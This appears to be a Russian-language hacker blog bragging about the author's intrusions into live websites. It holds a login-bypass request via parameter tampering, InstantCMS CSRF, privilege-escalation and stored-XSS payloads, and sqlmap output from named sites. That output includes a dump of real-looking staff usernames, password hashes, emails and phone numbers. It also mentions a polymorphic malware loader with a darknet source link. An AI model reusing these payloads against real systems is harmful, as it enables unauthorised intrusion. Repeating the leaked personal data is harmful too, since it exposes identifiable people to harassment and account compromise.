Your security is bad and you should feel bad!

security, безопасность, уязвимость, xss, sql-inj

полиморфный лоадер

В рамках рекламной кампании делаем лоадер и полиморфим ему код.

Описание и исходник тут — http://lwplxqzvmgu43uff.onion/viewtopic.php?id=9291

Чего только не бывает

В одной из CMS нашел интересное. При авторизации

data[0][name]=email&data[0][value]=admin@email.tld&data[1][name]=password&data[1][value]=bla-bla-bla&data[2][name]=remember&data[2][value]=1

Success: false

А при

data[0][name]=email&data[0][value]=admin@email.tld&data[1][name][]=password&data[1][value]=bla-bla-bla&data[2][name]=remember&data[2][value]=1

Success: true

О как бывает.

Продолжение даркнетовских историй

Тем временем в даркнете.

anthill2amberoad_min

 

PS: Что-то меня совсем Fallout4  захватил.

Фото-мап, глобально и надежно.

Сегодня увидел, что аноны нашли новую равлекалочку — http://photo-map.ru

Ну я мимо и не прошел. Глянул, подумал даже сначала, что там новомодный node.js или рельсы. Ан нет, великий и могучий PHP. Значит стоит попробовать.

Весь сайт работает на апи от вконтакта и яндекскартах. Но есть возможность получить короткую ссылку на свой поиск. Передаем POST-запросом параметры и получаем ссылку. Вроде все просто, но сколько я не пытался, получил только следующее:

web application technology: PHP 5.4.45
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] v_11159_photomap
Database: v_11159_photomap
[1 table]
+-----------+
| Bookmarks |
+-----------+
database management system users privileges:
[*] 'v_11159_dokz'@'localhost' [1]:
 privilege: USAGE

InstantCMS 0day’и не очень

Скопипащу самого себя с одного форума.

  1. Добавление в группу. Увидел сообщение с кодом — добавился. И так все понятно:
    <img src="http://dangeru72zvedwtg.onion/groups/414/join" width="0" alt=" " />
  2. Становимся модератором/админом.
    При регистрации перехватываем POST-запрос и меняем номер группы на админский

    Disposition: form-data; name="group_id"\r\n\r\n4\r\n
  3. Активная XSS (0day!)
    Редактирум свой профиль. Загружаем аватарку, включаем перехват в тампере и жмем «Сохранить». В перехвате ищем строку наподобие

    Content-Disposition: form-data; name="avatar[micro]"\r\n\r\n261/u26190/000/4c8765c9.jpg\r\n

    И меняем в ней данные на

    261/u26190/000/4c8765c9.jpg">window.location='http://fsb.ru'<a href="
    

Проверял всё тут

Не могу найти где я про один из способов прочитал, поэтому без ссылки. И 15 уже прошло.

Вот такое кино

logo

Ajax-запросы конечно изменили интернет и обычно не видны, но проверять их все-таки стоит.

И все бы было хорошо, если бы при POST-запросе на ajax/trailers_load фильтровали лучше. А так мы видим сообщение от Kohana v2.3.4. что «При обработке запроса произошла ошибка в базе данных».  Можно запускать sqlmap и смотреть внутренности. Но sqlmap не может в коммандной строке понять запрос

ignored={"trailers.modified <=1":1438290000}&offset=45&limit=15

из-за кавычек, поэтому их надо заменить на %22. Или брать запрос из файла.

select id,password,username,email,phone from users where acl_role_id=4 [4]:
[*] 7, fe4cf2f5126849380b792ba0cf1cd6ce0c050103f7c1fb806d, moderator, kinoafisha@ukr.net, +380956445707
[*] 8, 04e8e164c73b8319eb680139716083fc3df050be6d8d6b0124, moderator2, tsuganokanna@ukr.net, +380673003302
[*] 9, 5241bf9ae1ec12272a14335ce8f8210147b8fb7f74b6aed09e, moderatornews, al-ya@ukr.net, +380674195529
[*] 53600, a00f086196c2700641c1859e1b8a11f6349a9b3b2538f00f8a, kopiraiter, helen_de@ukr.net, +380679708826
select id,password,username,email,phone from users where acl_role_id=3 [7]:
[*] 1, 10fac025669b96f4f5a64a679f6f77c95c099a50487f3c52bc, admin, maxim@altsolution.net, +380677789451
[*] 3, d03611f5a4d62d342f05b8f4e4a635a6047557a71a6864fd81, maxim, office@altsolution.net, +380506159818
[*] 5, 6bb383f18d1634a324de92526970e7b80c35ea988c62f23dc6, den, den@altsolution.net, 
[*] 46538, 5a455bd83bf267d549488f1922c9e0d1f8b128b3af32a58ef2, uakubik, uakubik@altsolution.net, +380953546549
[*] 53652, 2aa5bd4c8f5c50049db91c738ae28cba4e087ad0b7d536e413, Dima, gerasymov@altsolution.net, +380982707685
[*] 60683, 81df112dbdf34077f5ee2557784dc787df6bd0de88b4951be5, alex, alex@altsolution.net, +380662254609
[*] 71445, 329094b2ac852594322cb04ecb7a63d12acc59aa0dcb75eb0f, tanya, tanya@altsolution.net, +380500267244

Опасные связи

Набрёл в сети TOR на одну крупную русскоязычную площадку, известную как «Опасные связи». Что-то типа социальной сети со стенами, кармой и клубами по интересам. Интересы, есстественно, нелегальные.  А там InstantCMS точёный. Вот и вышло так:

dangeru

PS: Внезапно Firefox с 38й версии перестал поддерживать javascript в аттрибутах background да и вообще в стилях. Теперь придется жить без background: url(javascript:alert(1))

PS: тот самый

Два плагина для поиска уязвимостей

Первый из них — всем известный Tamper Data.

Позволяет смотреть какие запросы идут из браузера на сервер и как сервер на них отвечает. А главная его особенность в том, что эти запросы можно перехватывать и модифицировать. Ну и как лог активности запросов очень неплох.

_tampd

Второй плагин не такой изветсный — HttpRequester.

Он может оправлять и принимать реквесты, вот и все. На самом деле далеко не все. Во первых он может отправлять GET/PUT/POST/DELETE с любыми параметрами, заголовками, данными. Так же он показывает ответ сервера, хоть в виде чистого лога http-запроса-ответа, хоть в виде «как оно будет (примерно) выглядеть в браузере». Плюс все это можно сохранить на будущее и воспользоваться сохранением позже.

_hhtprq

А самое главное, что эти плагины отлично работают на tor browser bundle.

Allo, мам, я в магазине

logo1

Что взять? Таблиц? Ок.

Database: new
Table: admin_user
[285 entries]

Table: enterprise_admin_passwords
[619 entries]

Table: customer
[89878 entries]

Самое интересное, что у админов SHA-256 + соль, у энтерпрайза просто SHA-256, а у кустомеров старый-добрый MD5.

Неплохо там начпокали, однако

chpoking1chpoking2

Даже и сказать нечего.